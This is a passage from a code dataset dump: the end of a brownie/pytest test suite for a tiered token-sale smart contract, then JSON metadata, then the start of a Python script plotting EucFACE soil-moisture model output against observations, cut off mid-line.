tiers\"):\n ftgsale.setTiersTokensAllocationFactors(3, 2, 8, {\"from\": accounts[0]})\n # admin launch the next phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n assert ftgsale.salePhase() == 1\n # verification that we cannot anymore access the setup functions\n with brownie.reverts(\"not setup phase\"):\n phaseDuration = 86400 * 2 # one day\n ftgsale.setPhasesDurations(phaseDuration, phaseDuration, phaseDuration)\n\n\n@pytest.fixture\ndef setup_durations(accounts, ftgsale):\n # definition of Sale's Phases durations\n phaseDuration = 86400 # one day\n return ftgsale.setPhasesDurations(phaseDuration, phaseDuration, phaseDuration)\n\n\n@pytest.fixture\ndef setup_tiersmin(accounts, ftgsale):\n # definition of Tiers minimum ftg locked staking\n RUBY_MIN = 100_000 * 10 ** 18\n SAPPHIRE_MIN = 250_000 * 10 ** 18\n EMERALD_MIN = 500_000 * 10 ** 18\n DIAMOND_MIN = 1_000_000 * 10 ** 18\n return ftgsale.setTiersMinFTGStakings(\n RUBY_MIN, SAPPHIRE_MIN, EMERALD_MIN, DIAMOND_MIN\n )\n\n\n@pytest.fixture\ndef setup_factors(accounts, ftgsale):\n # definition of tiers allocation factors\n return ftgsale.setTiersTokensAllocationFactors(2, 4, 8, {\"from\": accounts[0]})\n\n\ndef test_registration_phase(\n setup_durations,\n setup_tiersmin,\n setup_factors,\n ftgsale,\n ftgstaking,\n ntt,\n accounts,\n ftgtoken,\n investtoken,\n):\n print(\"********************Registration Phase Tests********************\")\n # setup fixtures applied\n # Tiers enum codes\n NONE = 0\n RUBY = 1\n SAPPHIRE = 2\n EMERALD = 3\n DIAMOND = 4\n # we launch next phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n # verifies that we are in registration phase of the sale\n assert ftgsale.salePhase() == 1\n # stakeholders prepare to participate\n # BEWARE OF 5% FEES APPLYING ON STAKINGS!\n # staking must be > tier_min_target/0.95\n # for Ruby, min staking > 105_264 ftg\n # for Sapphire, min staking > 263_158 ftg\n # for Emerald, min staking > 526_316 ftg\n # for Diamond, min staking > 1_052_631 ftg\n staking0 = 530_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking0, {\"from\": accounts[0]})\n ftgstaking.stake(staking0, 5184000, {\"from\": accounts[0]})\n staking1 = 1_100_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking1, {\"from\": accounts[1]})\n ftgstaking.stake(staking1, 2592000, {\"from\": accounts[1]})\n staking2 = 110_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking2, {\"from\": accounts[2]})\n ftgstaking.stake(staking2, 3000000, {\"from\": accounts[2]})\n staking3 = 60_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking3, {\"from\": accounts[3]})\n ftgstaking.stake(staking3, 6000000, {\"from\": accounts[3]})\n staking4 = 265_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking4, {\"from\": accounts[4]})\n ftgstaking.stake(staking4, 2592000, {\"from\": accounts[4]})\n # registration\n ftgsale.registerForSale({\"from\": accounts[0]})\n tx = ftgsale.registerForSale({\"from\": accounts[1]})\n print(tx.events)\n ftgsale.registerForSale({\"from\": accounts[2]})\n # verification of their registration\n print(\n \"checkParticipantLockedStaking(accounts[0], 2592000)=\",\n ftgstaking.checkParticipantLockedStaking(accounts[0], 2592000).return_value,\n )\n assert ftgsale.participants(accounts[0]) == (0, 0, True, EMERALD)\n assert ftgsale.participants(accounts[1]) == (0, 0, True, DIAMOND)\n assert ftgsale.participants(accounts[2]) == (0, 0, True, RUBY)\n # verification that the nb of participants per Tier was correctly incremented\n assert ftgsale.tiersNbOFParticipants(RUBY) == 1\n assert ftgsale.tiersNbOFParticipants(DIAMOND) == 1\n # verifies that a participant cannot register a second time\n with brownie.reverts(\"already registered\"):\n ftgsale.registerForSale({\"from\": accounts[2]})\n # verifies that a participant of NONE Tier cannot register\n with brownie.reverts(\"Not enough locked Staking\"):\n ftgsale.registerForSale({\"from\": accounts[3]})\n # time travel 86500 secs = 1 day and 100 secs\n timeTravel = 86500\n chain.sleep(timeTravel)\n # registration should be over\n # any registration attempts should be reverted\n with brownie.reverts(\"Registration Phase ended\"):\n ftgsale.registerForSale({\"from\": accounts[4]})\n\n\n# registration_phase_fixtures\n\n\ndef participants_stakings(ftgtoken, ftgstaking):\n staking0 = 530_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking0, {\"from\": accounts[0]})\n ftgstaking.stake(staking0, 5184000, {\"from\": accounts[0]})\n staking1 = 1_100_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking1, {\"from\": accounts[1]})\n ftgstaking.stake(staking1, 2592000, {\"from\": accounts[1]})\n staking2 = 110_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking2, {\"from\": accounts[2]})\n ftgstaking.stake(staking2, 3000000, {\"from\": accounts[2]})\n staking3 = 160_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking3, {\"from\": accounts[3]})\n ftgstaking.stake(staking3, 6000000, {\"from\": accounts[3]})\n staking4 = 265_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking4, {\"from\": accounts[4]})\n ftgstaking.stake(staking4, 2592000, {\"from\": accounts[4]})\n\n\n@pytest.fixture\ndef participants_preparation(ftgtoken, ftgstaking):\n # participants prepare for sale participation\n return participants_stakings(ftgtoken, ftgstaking)\n\n\ndef registration(ftgsale):\n # admin launch registration phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n # participants register\n for i in range(5):\n ftgsale.registerForSale({\"from\": accounts[i]})\n\n\n@pytest.fixture\ndef registration_phase(ftgsale):\n # admin launch registration and participants register\n return registration(ftgsale)\n\n\n# guaranteed pool phase tests\ndef test_guaranteed_pool_phase(\n setup_durations,\n setup_tiersmin,\n setup_factors,\n participants_preparation,\n registration_phase,\n ftgsale,\n ftgstaking,\n ntt,\n accounts,\n ftgtoken,\n investtoken,\n):\n print(\"********************Guaranteed Phase Tests********************\")\n # Tiers enum codes\n NONE = 0\n RUBY = 1\n SAPPHIRE = 2\n EMERALD = 3\n DIAMOND = 4\n # setup fixtures applied...\n # registration fixtures applied...:\n # verif accounts[0] staking for instance:\n assert (\n ftgstaking.getStakings(accounts[0])[-1][0]\n == 530000 * 10 ** 18 - ftgstaking.STAKING_FEE() * 530000 * 10 ** 18 / 100\n )\n # verif accounts[4] registration for instance\n assert ftgsale.participants(accounts[4]) == (0, 0, True, SAPPHIRE)\n # time travel to end registration phase\n chain.sleep(ftgsale.registrationPhaseDuration() + 60)\n # admin launch guaranteed phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n # verif that we are in guaranteed phase of the sale\n assert ftgsale.salePhase() == 2\n # check maxNbTokensPerPartRuby calculation\n print(\"ftgsale.maxNbTokensPerPartRuby =\", ftgsale.maxNbTokensPerPartRuby())\n sumFNP = 0\n expectedNbParticipants = [0, 2, 1, 1, 1]\n for i in range(1, 5):\n # check nb of participants per Tier\n print(\"Tiers \", i, \": nb of participants =\", ftgsale.tiersNbOFParticipants(i))\n assert ftgsale.tiersNbOFParticipants(i) == expectedNbParticipants[i]\n # calculate sumFNP\n sumFNP += ftgsale.tiersTokensAllocationFactor(\n i\n ) * ftgsale.tiersNbOFParticipants(i)\n # cheating a bit this test since python precision diff de pbr/math precision\n assert round(ftgsale.maxNbTokensPerPartRuby() / 10 ** 9, 0) == round(\n int(ftgsale.totalTokensToSell() / sumFNP) / 10 ** 9, 0\n )\n for i in range(1, 5):\n maxNb = (\n ftgsale.tiersTokensAllocationFactor(i) * ftgsale.maxNbTokensPerPartRuby()\n )\n print(\n \"Tier\", i, \"max purchaseable tokens per participant in GP:\", maxNb,\n )\n assert maxNb == ftgsale.maxNbTokensPerPartRuby() * 2 ** (i - 1)\n # check total number of participants\n ftgsale.NbOfParticipants() == 5\n # participants buy tokens\n print(\"tokenPrice =\", ftgsale.tokenPrice())\n tokenAmount0 = 100_000 * 10 ** 18 # (in token)\n investTokenAmount0 = (\n tokenAmount0 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"investTokenAmount0 =\", investTokenAmount0, \"investTokenWei\")\n investtoken.approve(ftgsale, investTokenAmount0, {\"from\": accounts[0]})\n tx = ftgsale.buytoken(tokenAmount0, {\"from\": accounts[0]})\n print(tx.events)\n tokenAmount2 = 400_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"investTokenAmount2 =\", investTokenAmount2, \"investTokenWei\")\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n # verify balances\n assert ftgsale.tokensSold() == tokenAmount0 + tokenAmount2\n assert ftgsale.investmentRaised() == investTokenAmount0 + investTokenAmount2\n print(\n \"ftgsale.participants(accounts[0]) =\", ftgsale.participants(accounts[0]),\n )\n print(\n \"ftgsale.participants(accounts[2]) =\", ftgsale.participants(accounts[2]),\n )\n assert ftgsale.participants(accounts[0])[0] == tokenAmount0\n assert ftgsale.participants(accounts[2])[0] == tokenAmount2\n assert ntt.balanceOf(accounts[0]) == tokenAmount0\n assert ntt.balanceOf(accounts[2]) == tokenAmount2\n # verify cannot buy more than entitled\n # accounts[4] is SAPPHIRE TIER, he cannot purchase more than 1_250_000 tokens\n tokenAmount4 = 1_300_000 * 10 ** 18 # (in token)\n investTokenAmount4 = (\n tokenAmount4 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"investTokenAmount4 =\", investTokenAmount4, \"investTokenWei\")\n investtoken.approve(ftgsale, investTokenAmount4, {\"from\": accounts[4]})\n with brownie.reverts(\"Maximum allowed number of tokens exceeded\"):\n ftgsale.buytoken(tokenAmount4, {\"from\": accounts[4]})\n # verify cannot buy when pool ended\n # time travel to end guaranteed pool phase\n chain.sleep(ftgsale.guaranteedPoolPhaseDuration() + 60)\n tokenAmount4 = 1_000_000 * 10 ** 18 # (in token)\n investTokenAmount4 = (\n tokenAmount4 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"second trial investTokenAmount4 =\", investTokenAmount4, \"investTokenWei\")\n investtoken.approve(ftgsale, investTokenAmount4, {\"from\": accounts[4]})\n with brownie.reverts(\"Guaranteed Pool Phase ended\"):\n ftgsale.buytoken(tokenAmount4, {\"from\": accounts[4]})\n\n\n# public pool phase fixtures\ndef guaranteed_pool(ftgsale, investtoken):\n # time travel to end registration phase\n chain.sleep(ftgsale.registrationPhaseDuration() + 60)\n # admin launch guaranteed phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n # participants buy tokens\n print(\"tokenPrice =\", ftgsale.tokenPrice())\n tokenAmount0 = 2_000_000 * 10 ** 18 # (in token)\n investTokenAmount0 = (\n tokenAmount0 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount0, {\"from\": accounts[0]})\n ftgsale.buytoken(tokenAmount0, {\"from\": accounts[0]})\n tokenAmount1 = 4_000_000 * 10 ** 18 # (in token)\n investTokenAmount1 = (\n tokenAmount1 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount1, {\"from\": accounts[1]})\n ftgsale.buytoken(tokenAmount1, {\"from\": accounts[1]})\n tokenAmount2 = 400_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n tokenAmount3 = 625_000 * 10 ** 18 # (in token)\n investTokenAmount3 = (\n tokenAmount3 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount3, {\"from\": accounts[3]})\n ftgsale.buytoken(tokenAmount3, {\"from\": accounts[3]})\n tokenAmount4 = 1_000_000 * 10 ** 18 # (in token)\n investTokenAmount4 = (\n tokenAmount4 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount4, {\"from\": accounts[4]})\n ftgsale.buytoken(tokenAmount4, {\"from\": accounts[4]})\n # time travel to end guaranteed pool phase\n chain.sleep(ftgsale.guaranteedPoolPhaseDuration() + 60)\n # admin launch guaranteed phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n\n\n@pytest.fixture\ndef guaranteed_pool_phase(ftgsale, investtoken):\n # guaranteed pool takes place\n return guaranteed_pool(ftgsale, investtoken)\n\n\n# public pool tests\ndef test_public_pool_phase(\n setup_durations,\n setup_tiersmin,\n setup_factors,\n participants_preparation,\n registration_phase,\n guaranteed_pool_phase,\n ftgsale,\n ftgstaking,\n ntt,\n accounts,\n ftgtoken,\n investtoken,\n):\n print(\"********************Guaranteed Phase Tests********************\")\n # Tiers enum codes\n NONE = 0\n RUBY = 1\n SAPPHIRE = 2\n EMERALD = 3\n DIAMOND = 4\n # setup fixtures applied...\n # registration fixtures applied...\n # guaranteed pool fixtures applied:\n # verif that we are in public pool phase of the sale\n assert ftgsale.salePhase() == 3\n # verifies remaining token\n print(\"NbOfParticipants = \", ftgsale.NbOfParticipants())\n assert ftgsale.NbOfParticipants() == 5\n print(\"totalTokensToSell =\", ftgsale.totalTokensToSell())\n assert ftgsale.tokensSold() == 8_025_000 * 10 ** 18\n print(\"investmentRaised =\", ftgsale.investmentRaised())\n\n print(\"Public Pool tokens for sale at start =\", ftgsale.publicPoolTokensAtPPStart())\n assert (\n ftgsale.publicPoolTokensAtPPStart()\n == ftgsale.totalTokensToSell() - ftgsale.tokensSold()\n )\n print(\"maxNbTokensPerPartAtPPStart =\", ftgsale.maxNbTokensPerPartAtPPStart())\n assert (\n ftgsale.maxNbTokensPerPartAtPPStart()\n == ftgsale.publicPoolTokensAtPPStart() / ftgsale.NbOfParticipants()\n )\n # verifies max number of purchaseable token evolves as expected with time\n # at public phase start\n # works fine, it requires function for testing purpose to be added in contract:\n \"\"\" //function for testing purpose\n /* function updateMaxNbTokensPerPartAtPP()\n public\n returns (uint256 maxNbTokensPerPartAtPP)\n {\n uint256 publicPoolTokens = totalTokensToSell - tokensSold;\n if (\n 4 * (block.timestamp - publicPoolPhaseStart) <\n 3 * publicPoolPhaseDuration\n ) {\n maxNbTokensPerPartAtPP =\n maxNbTokensPerPartAtPPStart +\n PRBMath.mulDiv(\n (block.timestamp - publicPoolPhaseStart),\n 4 * (publicPoolTokens - maxNbTokensPerPartAtPPStart),\n 3 * publicPoolPhaseDuration\n );\n } else {\n maxNbTokensPerPartAtPP = publicPoolTokens;\n }\n } */ \"\"\"\n\n \"\"\" maxNbTokensPerPartAtPP = ftgsale.updateMaxNbTokensPerPartAtPP.call(\n {\"from\": accounts[0]}\n )\n print(\"maxNbTokensPerPartAtPP at start = \", maxNbTokensPerPartAtPP)\n assert maxNbTokensPerPartAtPP == ftgsale.maxNbTokensPerPartAtPPStart()\n print(\"time at start = \", chain.time())\n # time travel to about one third of public pool phase duration\n chain.sleep(int(ftgsale.publicPoolPhaseDuration() * 0.33))\n print(\"time at one third of public pool phase = \", chain.time())\n print(\n \"(chain.time() - ftgsale.publicPoolPhaseStart())=\",\n (chain.time() - ftgsale.publicPoolPhaseStart()),\n )\n # verification of maxNbTokensPerPartAtPP calculation\n publicPoolTokens = ftgsale.totalTokensToSell() - ftgsale.tokensSold()\n pythonMaxNbTokensPerPartAtPP = ftgsale.maxNbTokensPerPartAtPPStart() + int(\n (chain.time() - ftgsale.publicPoolPhaseStart())\n * 4\n * (publicPoolTokens - ftgsale.maxNbTokensPerPartAtPPStart())\n / 3\n / ftgsale.publicPoolPhaseDuration()\n )\n tx = ftgsale.updateMaxNbTokensPerPartAtPP()\n print(tx.events)\n print(\"maxNbTokensPerPartAtPP at one third of public phase = \", tx.return_value)\n # cheating a bit this test since python precision diff de pbr/math precision\n assert round(tx.return_value / 10 ** 9, 0) == round(\n pythonMaxNbTokensPerPartAtPP / 10 ** 9, 0\n )\n # successive tokens purchase by accounts[2]\n # first purchase above maxNbTokensPerPartAtPPStart (395000) but below maxNbTokensPerPartAtPP\n # at one third of the public phase (1090200 tokens)\n tokenAmount2 = 800_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"investTokenAmount2 =\", investTokenAmount2)\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n # second purchase exceeding max purchase amount at one third of public pool phase\n # So it should be reverted\n tokenAmount2 = 300_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n with brownie.reverts(\"Maximum allowed number of tokens exceeded\"):\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n # time travel to about 83% of public pool phase duration\n chain.sleep(int(ftgsale.publicPoolPhaseDuration() * 0.50))\n # verif of max purchaseable tokens should be limited by\n # the number of remaining tokens only i.e. publicPoolTokens\n tx = ftgsale.updateMaxNbTokensPerPartAtPP()\n publicPoolTokens = ftgsale.totalTokensToSell() - ftgsale.tokensSold()\n assert publicPoolTokens == ftgsale.totalTokensToSell() - (\n 8_025_000 * 10 ** 18 + 800_000 * 10 ** 18\n )\n assert tx.return_value == publicPoolTokens\n print(\"maxNbTokensPerPartAtPP at 83% of public phase = \", tx.return_value)\n # new purchase by accounts[1] purchasing al remaining tokens\n tokenAmount1 = tx.return_value # (in token)\n investTokenAmount1 = (\n tokenAmount1 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount1, {\"from\": accounts[1]})\n ftgsale.buytoken(tokenAmount1, {\"from\": accounts[1]})\n # verify balances\n print(\n \"ftgsale.participants(accounts[1]) =\",\n ftgsale.participants(accounts[1]),\n )\n print(\n \"ftgsale.participants(accounts[2]) =\",\n ftgsale.participants(accounts[2]),\n )\n assert ftgsale.participants(accounts[1])[1] == tokenAmount1\n assert ftgsale.participants(accounts[2])[1] == 800000 * 10 ** 18\n assert ntt.balanceOf(accounts[1]) == (4_000_000 * 10 ** 18 + tokenAmount1)\n assert ntt.balanceOf(accounts[2]) == (400_000 * 10 ** 18 + 800_000 * 10 ** 18)\n print(\"totalToRaise =\", ftgsale.totalToRaise())\n print(\"investmentRaised =\", ftgsale.investmentRaised())\n print(\"tokensSold =\", ftgsale.tokensSold())\n # last purchase should trigger the end of the sale since totalToRaise has been reached\n assert ftgsale.salePhase() == 4 \"\"\"\n\n\n# saleCompleted fixtures\n\n\ndef public_pool(ftgsale, investtoken):\n # time travel to about one third of public pool phase duration\n chain.sleep(int(ftgsale.publicPoolPhaseDuration() * 0.33))\n # at one third of the public phase (1090200 purchasable tokens per part)\n tokenAmount2 = 500_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n tokenAmount4 = 700_000 * 10 ** 18 # (in token)\n investTokenAmount4 = (\n tokenAmount4 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount4, {\"from\": accounts[4]})\n ftgsale.buytoken(tokenAmount4, {\"from\": accounts[4]})\n # time travel to about 83% of public pool phase duration\n # after 75% of public pool phase passed, no limitation of number\n # of purchasable tokens by participant\n chain.sleep(int(ftgsale.publicPoolPhaseDuration() * 0.50))\n # accounts[1] purchase all remaining tokens\n publicPoolTokens = ftgsale.totalTokensToSell() - ftgsale.tokensSold()\n tokenAmount1 = publicPoolTokens # (in token)\n investTokenAmount1 = (\n tokenAmount1 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount1, {\"from\": accounts[1]})\n ftgsale.buytoken(tokenAmount1, {\"from\": accounts[1]})\n\n\n@pytest.fixture\ndef public_pool_phase(ftgsale, investtoken):\n # guaranteed pool takes place\n return public_pool(ftgsale, investtoken)\n\n\n@pytest.fixture\ndef saletoken(MockFTGToken, accounts):\n print(\"saletoken deployment by accounts[0]=\", accounts[0])\n return MockFTGToken.deploy(20_000_000 * 10 ** 18, {\"from\": accounts[0]})\n\n\n@pytest.fixture\ndef redeemer(Redeemer, ntt, saletoken):\n return Redeemer.deploy(ntt, saletoken, {\"from\": accounts[0]})\n\n\n# salecompleted tests\n\n\ndef test_sale_completed(\n setup_durations,\n setup_tiersmin,\n setup_factors,\n participants_preparation,\n registration_phase,\n guaranteed_pool_phase,\n public_pool_phase,\n saletoken,\n redeemer,\n ftgsale,\n ftgstaking,\n ntt,\n accounts,\n ftgtoken,\n investtoken,\n):\n print(\"********************Sale completed Phase Tests********************\")\n\n # setup fixtures applied...\n # registration fixtures applied...\n # guaranteed pool fixtures applied...\n # public pool fixtures aplied:\n # last purchase should trigger the end of the sale since totalToRaise has been reached\n assert ftgsale.salePhase() == 4\n # owner of saletoken to send the saletoken to redeemer\n # ftgtoken.transfer(redeemer, 100 * 10**18, {\"from\": accounts[0]})\n saletoken.approve(redeemer, ftgsale.totalTokensToSell(), {\"from\": accounts[0]})\n redeemer.depositSaleTokens(ftgsale.totalTokensToSell(), {\"from\": accounts[0]})\n # Redeemer must be made owner of ntt\n ntt.addOwner(redeemer, {\"from\": accounts[0]})\n # At this point, the Redeemer contract has the saleTokens, participants can\n # redeem their ntt for real tokens\n redeemer.claim({\"from\": accounts[3]})\n assert saletoken.balanceOf(accounts[3]) == 625_000 * 10 ** 18\n redeemer.claim({\"from\": accounts[2]})\n assert saletoken.balanceOf(accounts[2]) == 900_000 * 10 ** 18\n\n","repo_name":"Ongoapp-org/contracts","sub_path":"tests/test_ftgSale_general.py","file_name":"test_ftgSale_general.py","file_ext":"py","file_size_in_byte":25697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18775539580","text":"#!/usr/bin/env python\n\n\"\"\"\nPlot EucFACE soil moisture at observated dates\n\nThat's all folks.\n\"\"\"\n\n__author__ = \"MU Mengyuan\"\n__version__ = \"2019-10-06\"\n__changefrom__ = 'plot_eucface_swc_cable_vs_obs.py'\n\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nfrom matplotlib import ticker\nimport datetime as dt\nimport netCDF4 as nc\nfrom scipy.interpolate import griddata\n\ndef main(fobs, fcable, case_name, ring, layer, cable_version):\n\n tdr = pd.read_csv(fobs, usecols = ['Ring','Date','swc.tdr'])\n tdr['Date'] = pd.to_datetime(tdr['Date'],format=\"%Y-%m-%d\",infer_datetime_format=False)\n tdr['Date'] = tdr['Date'] - pd.datetime(2011,12,31)\n tdr['Date'] = tdr['Date'].dt.days\n tdr = tdr.sort_values(by=['Date'])\n # divide neo into groups\n if ring == 'amb':\n subset = tdr[(tdr['Ring'].isin(['R2','R3','R6'])) & (tdr.Date > 366)]\n elif ring == 'ele':\n subset = tdr[(tdr['Ring'].isin(['R1','R4','R5'])) & (tdr.Date > 366)]\n else:\n subset = tdr[(tdr['Ring'].isin([ring])) & (tdr.Date > 366)]\n\n subset = subset.groupby(by=[\"Date\"]).mean()/100.\n subset = subset.xs('swc.tdr', axis=1, drop_level=True)\n #print(subset)\n# _________________________ CABLE ___________________________\n cable = nc.Dataset(fcable, 'r')\n Time = nc.num2date(cable.variables['time'][:],cable.variables['time'].units)\n SoilMoist = pd.DataFrame(cable.variables['SoilMoist'][:,0,0,0], columns=['SoilMoist'])\n\n SoilMoist['SoilMoist'] = ( cable.variables['SoilMoist'][:,0,0,0]*0.022 \\\n + cable.variables['SoilMoist'][:,1,0,0]*0.058 \\\n + cable.variables['SoilMoist'][:,2,0,0]*0.154 \\\n + cable.variables['SoilMoist'][:,3,0,0]*(0.5-0.022-0.058-0.154) )/0.5\n SoilMoist['dates'] = Time\n SoilMoist = SoilMoist.set_index('dates')\n SoilMoist = SoilMoist.resample(\"D\").agg('mean')\n SoilMoist.index = SoilMoist.index - pd.datetime(2011,12,31)\n SoilMoist.index = SoilMoist.index.days\n SoilMoist = SoilMoist.sort_values(by=['dates'])\n\n TVeg = pd.DataFrame(cable.variables['TVeg'][:,0,0],columns=['TVeg'])\n TVeg = TVeg*1800.\n TVeg['dates'] = Time\n TVeg = TVeg.set_index('dates')\n TVeg = TVeg.resample(\"D\").agg('sum')\n TVeg.index = TVeg.index - pd.datetime(2011,12,31)\n TVeg.index = TVeg.index.days\n\n ESoil = pd.DataFrame(cable.variables['ESoil'][:,0,0],columns=['ESoil'])\n ESoil = ESoil*1800.\n ESoil['dates'] = Time\n ESoil = ESoil.set_index('dates')\n ESoil = ESoil.resample(\"D\").agg('sum')\n ESoil.index = ESoil.index - pd.datetime(2011,12,31)\n ESoil.index = ESoil.index.days\n\n\n '''\n Rainf = pd.DataFrame(cable.variables['Rainf'][:,0,0],columns=['Rainf'])\n Rainf = Rainf*1800.\n Rainf['dates'] = Time\n Rainf = Rainf.set_index('dates')\n Rainf = Rainf.resample(\"D\").agg('sum')\n Rainf.index = Rainf.index - pd.datetime(2011,12,31)\n Rainf.index = Rainf.index.days\n\n Fwsoil = pd.DataFrame(cable.variables['Fwsoil'][:,0,0],columns=['Fwsoil'])\n Fwsoil['dates'] = Time\n Fwsoil = Fwsoil.set_index('dates')\n Fwsoil = Fwsoil.resample(\"D\").agg('mean')\n Fwsoil.index = Fwsoil.index - pd.datetime(2011,12,31)\n Fwsoil.index = Fwsoil.index.days\n '''\n\n swilt = np.zeros(len(SoilMoist))\n sfc = np.zeros(len(SoilMoist))\n ssat = np.zeros(len(SoilMoist))\n effctv_sat = np.zeros(len(SoilMoist))\n\n if cable_version == \"pore_scale_model\":\n Watr = cable.variables['Watr'][0]\n elif cable_version == \"Mark_latest\":\n Watr = 0.02355\n\n for i in np.arange(len(SoilMoist)):\n\n swilt[i]= cable.variables['swilt'][0]\n sfc[i] = cable.variables['sfc'][0]\n ssat[i] = cable.variables['ssat'][0]\n print(Watr)\n print(swilt[i])\n print(sfc[i])\n print(ssat[i])\n print(SoilMoist.values[i])\n effctv_sat[i] = (SoilMoist.values[i] - Watr)/(ssat[i] - Watr)\n\n# ____________________ Plot obs _______________________\n fig = plt.figure(figsize=[15,10])\n fig.subplots_adjust(hspace=0.1)\n fig.subplots_adjust(wspace=0.05)\n plt.rcParams['text.usetex'] = False\n plt.rcParams['font.family'] = \"sans-serif\"\n plt.rcParams['font.sans-serif'] = \"Helvetica\"\n plt.rcParams['axes.labelsize'] = 14\n plt.rcParams['font.size'] = 14\n plt.rcParams['legend.fontsize'] = 10\n plt.rcParams['xtick.labelsize'] = 14\n plt.rcParams['ytick.labelsize'] = 14\n\n almost_black = '#262626'\n # change the tick colors also to the almost black\n plt.rcParams['ytick.color'] = almost_black\n plt.rcParams['xtick.color'] = almost_black\n\n # change the text colors also to the almost black\n plt.rcParams['text.color'] = almost_black\n\n # Change the default axis colors from black to a slightly lighter black,\n # and a little thinner (0.5 instead of 1)\n plt.rcParams['axes.edgecolor'] = almost_black\n plt.rcParams['axes.labelcolor'] = almost_black\n\n ax1 = fig.add_subplot(311)\n ax2 = fig.add_subplot(312)\n ax3 = fig.add_subplot(313)\n\n width = 1.\n x = SoilMoist.index\n #np.arange(len(Rainf.index))\n #print(x)\n #print(Rainf.values)\n\n ax1.plot(subset.index, subset.values, c=\"green\", lw=1.0, ls=\"-\", label=\"tdr\")\n ax1.plot(x, SoilMoist.values,c=\"orange\", lw=1.0, ls=\"-\", label=\"swc\")\n ax1.plot(x, swilt, c=\"black\", lw=1.0, ls=\"-\", label=\"swilt\")\n ax1.plot(x, sfc, c=\"black\", lw=1.0, ls=\"-.\", label=\"sfc\")\n ax1.plot(x, ssat, c=\"black\", lw=1.0, ls=\":\", label=\"ssat\")\n ax2.plot(x, effctv_sat, c=\"forestgreen\", lw=1.0, ls=\"-\", label=\"Fwsoil\")\n ax3.plot(x, TVeg['TVeg'].rolling(window=7).mean(), c=\"green\", lw=1.0, ls=\"-\", label=\"TVeg\")\n ax3.plot(x, ESoil['ESoil'].rolling(window=7).mean(), c=\"orange\", lw=1.0, ls=\"-\", label=\"ESoil\")\n\n cleaner_dates = [\"2013\",\"2014\",\"2015\",\"2016\",\"2017\",\"2018\",\"2019\"]\n xtickslocs = [367,732,1097,1462,1828,2193,2558]\n\n plt.setp(ax1.get_xticklabels(), visible=False)\n ax1.set(xticks=xtickslocs, xticklabels=cleaner_dates) ####\n ax1.set_ylabel(\"VWC (m3/m3)\")\n ax1.axis('tight')\n ax1.set_ylim(0,0.5)\n ax1.set_xlim(367,2739)\n ax1.legend()\n\n plt.setp(ax2.get_xticklabels(), visible=False)\n ax2.set(xticks=xtickslocs, xticklabels=cleaner_dates) ####\n ax2.set_ylabel(\"Effective Saturation (-)\")\n ax2.axis('tight')\n ax2.set_ylim(0.,1.)\n ax2.set_xlim(367,2739)\n\n #plt.setp(ax3.get_xticklabels(), visible=False)\n ax3.set(xticks=xtickslocs, xticklabels=cleaner_dates) ####\n ax3.set_ylabel(\"TVeg, ESoil (mm/day)\")\n ax3.axis('tight')\n ax3.set_ylim(0.,4.)\n ax3.set_xlim(367,2739)\n ax3.legend()\n fig.savefig(\"EucFACE_tdr_%s_%s.png\" % (case_name, ring), bbox_inches='tight', pad_inches=0.1)\n\nif __name__ == 